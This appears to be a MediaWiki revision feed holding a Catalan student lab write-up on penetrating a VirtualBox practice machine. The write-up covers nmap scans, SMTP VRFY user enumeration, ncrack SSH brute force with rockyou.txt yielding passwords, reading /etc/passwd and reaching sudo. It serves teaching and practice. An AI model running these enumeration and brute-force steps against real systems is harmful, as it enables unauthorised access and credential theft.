<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="ca">
	<id>http://wiki.lordwektabyte.cat/index.php?action=history&amp;feed=atom&amp;title=ASIX%2FM16%2FUF2%2FEX3%2F3</id>
	<title>ASIX/M16/UF2/EX3/3 - Historial de revisió</title>
	<link rel="self" type="application/atom+xml" href="http://wiki.lordwektabyte.cat/index.php?action=history&amp;feed=atom&amp;title=ASIX%2FM16%2FUF2%2FEX3%2F3"/>
	<link rel="alternate" type="text/html" href="http://wiki.lordwektabyte.cat/index.php?title=ASIX/M16/UF2/EX3/3&amp;action=history"/>
	<updated>2026-05-05T06:53:15Z</updated>
	<subtitle>Historial de revisió per a aquesta pàgina del wiki</subtitle>
	<generator>MediaWiki 1.34.0</generator>
	<entry>
		<id>http://wiki.lordwektabyte.cat/index.php?title=ASIX/M16/UF2/EX3/3&amp;diff=5188&amp;oldid=prev</id>
		<title>Guillem: Guillem ha mogut M16/UF2/EX3/3 a ASIX/M16/UF2/EX3/3 sense deixar una redirecció: Crear subnivell ASIX</title>
		<link rel="alternate" type="text/html" href="http://wiki.lordwektabyte.cat/index.php?title=ASIX/M16/UF2/EX3/3&amp;diff=5188&amp;oldid=prev"/>
		<updated>2020-04-15T11:33:55Z</updated>

		<summary type="html">&lt;p&gt;Guillem ha mogut &lt;a href=&quot;/index.php?title=M16/UF2/EX3/3&amp;amp;action=edit&amp;amp;redlink=1&quot; class=&quot;new&quot; title=&quot;M16/UF2/EX3/3 (encara no existeix)&quot;&gt;M16/UF2/EX3/3&lt;/a&gt; a &lt;a href=&quot;/wiki/ASIX/M16/UF2/EX3/3&quot; title=&quot;ASIX/M16/UF2/EX3/3&quot;&gt;ASIX/M16/UF2/EX3/3&lt;/a&gt; sense deixar una redirecció: Crear subnivell ASIX&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left&quot; data-mw=&quot;interface&quot;&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;ca&quot;&gt;
				&lt;td colspan=&quot;1&quot; style=&quot;background-color: #fff; color: #222; text-align: center;&quot;&gt;← Versió més antiga&lt;/td&gt;
				&lt;td colspan=&quot;1&quot; style=&quot;background-color: #fff; color: #222; text-align: center;&quot;&gt;Revisió del 11:33, 15 abr 2020&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-notice&quot; lang=&quot;ca&quot;&gt;&lt;div class=&quot;mw-diff-empty&quot;&gt;(Cap diferència)&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</summary>
		<author><name>Guillem</name></author>
		
	</entry>
	<entry>
		<id>http://wiki.lordwektabyte.cat/index.php?title=ASIX/M16/UF2/EX3/3&amp;diff=3893&amp;oldid=prev</id>
		<title>Guillem a 12:55, 17 març 2019</title>
		<link rel="alternate" type="text/html" href="http://wiki.lordwektabyte.cat/index.php?title=ASIX/M16/UF2/EX3/3&amp;diff=3893&amp;oldid=prev"/>
		<updated>2019-03-17T12:55:46Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;ca&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #222; text-align: center;&quot;&gt;← Versió més antiga&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #222; text-align: center;&quot;&gt;Revisió del 12:55, 17 març 2019&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l1&quot; &gt;Línia 1:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Línia 1:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #222; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;==Anàlisi general==&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #222; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;Primer de tot, podem executar un &amp;lt;code&amp;gt;nmap&amp;lt;/code&amp;gt; a tota la xarxa de VirtualBox per a detectar quina adreça IP ha sigut assignada a la màquina que analitzarem&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #222; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;Primer de tot, podem executar un &amp;lt;code&amp;gt;nmap&amp;lt;/code&amp;gt; a tota la xarxa de VirtualBox per a detectar quina adreça IP ha sigut assignada a la màquina que analitzarem&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #222; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&amp;lt;source&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #222; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&amp;lt;source&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Guillem</name></author>
		
	</entry>
	<entry>
		<id>http://wiki.lordwektabyte.cat/index.php?title=ASIX/M16/UF2/EX3/3&amp;diff=3892&amp;oldid=prev</id>
		<title>Guillem a 12:55, 17 març 2019</title>
		<link rel="alternate" type="text/html" href="http://wiki.lordwektabyte.cat/index.php?title=ASIX/M16/UF2/EX3/3&amp;diff=3892&amp;oldid=prev"/>
		<updated>2019-03-17T12:55:39Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;a href=&quot;http://wiki.lordwektabyte.cat/index.php?title=ASIX/M16/UF2/EX3/3&amp;amp;diff=3892&amp;amp;oldid=3889&quot;&gt;Mostra els canvis&lt;/a&gt;</summary>
		<author><name>Guillem</name></author>
		
	</entry>
	<entry>
		<id>http://wiki.lordwektabyte.cat/index.php?title=ASIX/M16/UF2/EX3/3&amp;diff=3889&amp;oldid=prev</id>
		<title>Guillem: Es crea la pàgina amb «==Anàlisi general== Primer de tot, podem executar un &lt;code&gt;nmap&lt;/code&gt; a tota la xarxa de VirtualBox per a detectar quina adreça IP ha sigut assignada a la màquina...».</title>
		<link rel="alternate" type="text/html" href="http://wiki.lordwektabyte.cat/index.php?title=ASIX/M16/UF2/EX3/3&amp;diff=3889&amp;oldid=prev"/>
		<updated>2019-03-17T12:53:27Z</updated>

		<summary type="html">&lt;p&gt;Es crea la pàgina amb «==Anàlisi general== Primer de tot, podem executar un &amp;lt;code&amp;gt;nmap&amp;lt;/code&amp;gt; a tota la xarxa de VirtualBox per a detectar quina adreça IP ha sigut assignada a la màquina...».&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Pàgina nova&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==Anàlisi general==&lt;br /&gt;
Primer de tot, podem executar un &amp;lt;code&amp;gt;nmap&amp;lt;/code&amp;gt; a tota la xarxa de VirtualBox per a detectar quina adreça IP ha sigut assignada a la màquina que analitzarem&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
root@kali-gsb:~# nmap 10.16.2.0/24&lt;br /&gt;
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-17 12:21 CET&lt;br /&gt;
Nmap scan report for 10.16.2.1&lt;br /&gt;
Host is up (0.00038s latency).&lt;br /&gt;
Not shown: 999 closed ports&lt;br /&gt;
PORT   STATE SERVICE&lt;br /&gt;
53/tcp open  domain&lt;br /&gt;
MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)&lt;br /&gt;
&lt;br /&gt;
Nmap scan report for 10.16.2.2&lt;br /&gt;
Host is up (0.00064s latency).&lt;br /&gt;
Not shown: 994 closed ports&lt;br /&gt;
PORT     STATE SERVICE&lt;br /&gt;
22/tcp   open  ssh&lt;br /&gt;
80/tcp   open  http&lt;br /&gt;
631/tcp  open  ipp&lt;br /&gt;
3306/tcp open  mysql&lt;br /&gt;
8010/tcp open  xmpp&lt;br /&gt;
8888/tcp open  sun-answerbook&lt;br /&gt;
MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)&lt;br /&gt;
&lt;br /&gt;
Nmap scan report for 10.16.2.3&lt;br /&gt;
Host is up (0.00043s latency).&lt;br /&gt;
All 1000 scanned ports on 10.16.2.3 are filtered&lt;br /&gt;
MAC Address: 08:00:27:1D:7B:F3 (Oracle VirtualBox virtual NIC)&lt;br /&gt;
&lt;br /&gt;
Nmap scan report for 10.16.2.9&lt;br /&gt;
Host is up (0.00038s latency).&lt;br /&gt;
Not shown: 992 closed ports&lt;br /&gt;
PORT    STATE SERVICE&lt;br /&gt;
22/tcp  open  ssh&lt;br /&gt;
25/tcp  open  smtp&lt;br /&gt;
53/tcp  open  domain&lt;br /&gt;
110/tcp open  pop3&lt;br /&gt;
143/tcp open  imap&lt;br /&gt;
389/tcp open  ldap&lt;br /&gt;
993/tcp open  imaps&lt;br /&gt;
995/tcp open  pop3s&lt;br /&gt;
MAC Address: 08:00:27:DB:66:F2 (Oracle VirtualBox virtual NIC)&lt;br /&gt;
&lt;br /&gt;
Nmap scan report for 10.16.2.11&lt;br /&gt;
Host is up (0.0000060s latency).&lt;br /&gt;
Not shown: 999 closed ports&lt;br /&gt;
PORT   STATE SERVICE&lt;br /&gt;
22/tcp open  ssh&lt;br /&gt;
&lt;br /&gt;
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.38 seconds&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Deduïm que la màquina d'enumeració és la que es troba a &amp;lt;code&amp;gt;10.16.2.9&amp;lt;/code&amp;gt; ja que la resta no tenen serveis publicats o bé és el Kali mateix,&lt;br /&gt;
&lt;br /&gt;
==Anàlisi acotat==&lt;br /&gt;
Una vegada fet això, podem executar &amp;lt;code&amp;gt;nmap&amp;lt;/code&amp;gt; de nou contra aquella màquina concreta per a llistar en detall els serveis que s'hi estan executant&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
root@kali-gsb:~# nmap 10.16.2.9 -sV&lt;br /&gt;
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-17 12:22 CET&lt;br /&gt;
Nmap scan report for 10.16.2.9&lt;br /&gt;
Host is up (0.00036s latency).&lt;br /&gt;
Not shown: 992 closed ports&lt;br /&gt;
PORT    STATE SERVICE    VERSION&lt;br /&gt;
22/tcp  open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)&lt;br /&gt;
25/tcp  open  smtp       Postfix smtpd&lt;br /&gt;
53/tcp  open  domain     ISC BIND 9.11.3-1ubuntu1.5 (Ubuntu Linux)&lt;br /&gt;
110/tcp open  pop3       Dovecot pop3d&lt;br /&gt;
143/tcp open  imap       Dovecot imapd (Ubuntu)&lt;br /&gt;
389/tcp open  ldap       OpenLDAP 2.2.X - 2.3.X&lt;br /&gt;
993/tcp open  ssl/imaps?&lt;br /&gt;
995/tcp open  ssl/pop3s?&lt;br /&gt;
MAC Address: 08:00:27:DB:66:F2 (Oracle VirtualBox virtual NIC)&lt;br /&gt;
Service Info: Host:  enum.iescarlesvallbona.cat; OS: Linux; CPE: cpe:/o:linux:linux_kernel&lt;br /&gt;
&lt;br /&gt;
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .&lt;br /&gt;
Nmap done: 1 IP address (1 host up) scanned in 15.84 seconds&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Anàlisi de serveis==&lt;br /&gt;
===SMTP===&lt;br /&gt;
Veiem que hi ha obert un servidor SMTP. Segons apunts de la UF, podem provar si la comanda &amp;lt;code&amp;gt;VRFY &amp;lt;usuari&amp;gt;&amp;lt;/code&amp;gt; es permet i podem extreure algun usuari relacionat amb l'organització des d'on s'ha extret aquesta màquina (Institut Carles Vallbona)&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
root@kali-gsb:~# telnet 10.16.2.9 25&lt;br /&gt;
Trying 10.16.2.9...&lt;br /&gt;
Connected to 10.16.2.9.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
220 enum.iescarlesvallbona.cat ESMTP Postfix (Ubuntu)&lt;br /&gt;
VRFY roger&lt;br /&gt;
252 2.0.0 roger&lt;br /&gt;
VRFY pau&lt;br /&gt;
252 2.0.0 pau&lt;br /&gt;
VRFY julian&lt;br /&gt;
252 2.0.0 julian&lt;br /&gt;
VRFY jaume&lt;br /&gt;
252 2.0.0 jaume&lt;br /&gt;
VRFY guillem&lt;br /&gt;
550 5.1.1 &amp;lt;guillem&amp;gt;: Recipient address rejected: User unknown in local recipient table&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Veiem, manualment, que aquests usuaris existeixen excepte ''guillem''. Això ens pot ser suficient per a provar d'extreure contrasenyes dels usuaris mitjançant força bruta a través del servei SSH per exemple.&lt;br /&gt;
&lt;br /&gt;
Una altra opció seria utilitzar ''scripts'' o mòduls de NMap per a passar-li llistes d'usuaris i que ens retorni si existeixen al sistema o no.&lt;br /&gt;
&lt;br /&gt;
===SSH===&lt;br /&gt;
Amb &amp;lt;code&amp;gt;ncrack&amp;lt;/code&amp;gt; provarem d'accedir per SSH amb algun usuari que tingui una contrasenya feble o vulnerable present al ''wordlist'' de Kali ''rockyou.txt''&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
root@kali-gsb:~# ncrack -p 22 -user roger -P /usr/share/wordlists/rockyou.txt 10.16.2.9&lt;br /&gt;
&lt;br /&gt;
Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-03-17 12:30 CET&lt;br /&gt;
&lt;br /&gt;
Discovered credentials for ssh on 10.16.2.9 22/tcp:&lt;br /&gt;
10.16.2.9 22/tcp ssh: 'roger' 'whatever'&lt;br /&gt;
&lt;br /&gt;
Ncrack done: 1 service scanned in 3.00 seconds.&lt;br /&gt;
&lt;br /&gt;
Ncrack finished.&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Hem trobat que l'usuari ''roger'' té la contrasenya ''whatever''.&lt;br /&gt;
&lt;br /&gt;
El següent pas serà accedir per SSH amb aquestes credencials i mirar si tenim permisos per llegir l'arxiu &amp;lt;code&amp;gt;/etc/passwd&amp;lt;/code&amp;gt; i poder així, llistar la resta d'usuaris del sistema en la seva totalitat.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
root@kali-gsb:~# ssh roger@10.16.2.9&lt;br /&gt;
roger@10.16.2.9's password: &lt;br /&gt;
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-46-generic x86_64)&lt;br /&gt;
&lt;br /&gt;
 * Documentation:  https://help.ubuntu.com&lt;br /&gt;
 * Management:     https://landscape.canonical.com&lt;br /&gt;
 * Support:        https://ubuntu.com/advantage&lt;br /&gt;
&lt;br /&gt;
  System information as of Sun Mar 17 11:32:39 UTC 2019&lt;br /&gt;
&lt;br /&gt;
  System load:  0.0               Processes:             98&lt;br /&gt;
  Usage of /:   44.7% of 9.78GB   Users logged in:       0&lt;br /&gt;
  Memory usage: 4%                IP address for enp0s3: 10.16.2.9&lt;br /&gt;
  Swap usage:   0%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
118 packages can be updated.&lt;br /&gt;
0 updates are security updates.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Last login: Sun Mar 17 11:30:24 2019 from 10.16.2.11&lt;br /&gt;
roger@enum:~$ cat /etc/passwd&lt;br /&gt;
root:x:0:0:root:/root:/bin/bash&lt;br /&gt;
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin&lt;br /&gt;
bin:x:2:2:bin:/bin:/usr/sbin/nologin&lt;br /&gt;
sys:x:3:3:sys:/dev:/usr/sbin/nologin&lt;br /&gt;
sync:x:4:65534:sync:/bin:/bin/sync&lt;br /&gt;
games:x:5:60:games:/usr/games:/usr/sbin/nologin&lt;br /&gt;
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin&lt;br /&gt;
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin&lt;br /&gt;
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin&lt;br /&gt;
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin&lt;br /&gt;
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin&lt;br /&gt;
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin&lt;br /&gt;
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin&lt;br /&gt;
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin&lt;br /&gt;
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin&lt;br /&gt;
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin&lt;br /&gt;
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin&lt;br /&gt;
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin&lt;br /&gt;
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin&lt;br /&gt;
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin&lt;br /&gt;
syslog:x:102:106::/home/syslog:/usr/sbin/nologin&lt;br /&gt;
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin&lt;br /&gt;
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin&lt;br /&gt;
lxd:x:105:65534::/var/lib/lxd/:/bin/false&lt;br /&gt;
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin&lt;br /&gt;
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin&lt;br /&gt;
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin&lt;br /&gt;
pollinate:x:109:1::/var/cache/pollinate:/bin/false&lt;br /&gt;
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin&lt;br /&gt;
enum:x:1000:1000:enum:/home/enum:/bin/bash&lt;br /&gt;
julian:x:1001:1001:,,,:/home/julian:/bin/bash&lt;br /&gt;
pau:x:1002:1002:,,,:/home/pau:/bin/bash&lt;br /&gt;
jaume:x:1003:1003:,,,:/home/jaume:/bin/bash&lt;br /&gt;
xavi:x:1004:1004:,,,:/home/xavi:/bin/bash&lt;br /&gt;
roger:x:1005:1005:,,,:/home/roger:/bin/bash&lt;br /&gt;
bind:x:111:113::/var/cache/bind:/usr/sbin/nologin&lt;br /&gt;
Debian-snmp:x:112:114::/var/lib/snmp:/bin/false&lt;br /&gt;
postfix:x:113:116::/var/spool/postfix:/usr/sbin/nologin&lt;br /&gt;
dovecot:x:114:118:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin&lt;br /&gt;
dovenull:x:115:119:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin&lt;br /&gt;
openldap:x:116:120:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
També podem provar si aquest usuari té permisos de ''sudo'':&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
roger@enum:~$ sudo nano /etc/passwd&lt;br /&gt;
[sudo] password for roger: &lt;br /&gt;
roger is not in the sudoers file.  This incident will be reported.&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
L'usuari ''roger'' no està a &amp;lt;code&amp;gt;sudoers&amp;lt;/code&amp;gt;, però al veure que es tracta d'un Ubuntu, podem deduir que l'usuari amb UID=1000 tindrà permisos de ''sudo''. Segons l'arxiu d'usuaris, aquest usuari correspon a ''enum'':&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
enum:x:1000:1000:enum:/home/enum:/bin/bash&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Per tant, el següent pas, serà executar &amp;lt;code&amp;gt;ncrack&amp;lt;/code&amp;gt; de nou amb l'usuari ''enum'' per veure si la contrasenya és present en aquell wordlist&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
root@kali-gsb:~# ncrack -p 22 -user enum -P /usr/share/wordlists/rockyou.txt 10.16.2.9&lt;br /&gt;
 &lt;br /&gt;
Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-03-17 12:30 CET&lt;br /&gt;
 &lt;br /&gt;
Discovered credentials for ssh on 10.16.2.9 22/tcp:&lt;br /&gt;
10.16.2.9 22/tcp ssh: 'enum' 'trustno1'&lt;br /&gt;
 &lt;br /&gt;
Ncrack done: 1 service scanned in 3.00 seconds.&lt;br /&gt;
 &lt;br /&gt;
Ncrack finished.&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accedirem per SSH amb la contrasenya que hem extret&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
root@kali-gsb:~# ssh enum@10.16.2.9&lt;br /&gt;
enum@10.16.2.9's password: &lt;br /&gt;
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-46-generic x86_64)&lt;br /&gt;
&lt;br /&gt;
 * Documentation:  https://help.ubuntu.com&lt;br /&gt;
 * Management:     https://landscape.canonical.com&lt;br /&gt;
 * Support:        https://ubuntu.com/advantage&lt;br /&gt;
&lt;br /&gt;
  System information as of Sun Mar 17 12:38:49 UTC 2019&lt;br /&gt;
&lt;br /&gt;
  System load:  0.31              Processes:             98&lt;br /&gt;
  Usage of /:   45.5% of 9.78GB   Users logged in:       0&lt;br /&gt;
  Memory usage: 4%                IP address for enp0s3: 10.16.2.9&lt;br /&gt;
  Swap usage:   0%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
118 packages can be updated.&lt;br /&gt;
0 updates are security updates.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Last login: Wed Feb 20 16:38:32 2019 from 10.16.2.8&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Aleshores farem la mateixa prova que amb l'altre usuari: executar una comanda amb ''sudo'' per veure si podem fer un moviment vertical i arribar a poder administrar el sistema o modificar arxius dins del ''home'' de l'usuari ''root'':&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
sudo nano /root/prova.enum&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Veiem que se'ns dóna permís.&lt;/div&gt;</summary>
		<author><name>Guillem</name></author>
		
	</entry>
</feed>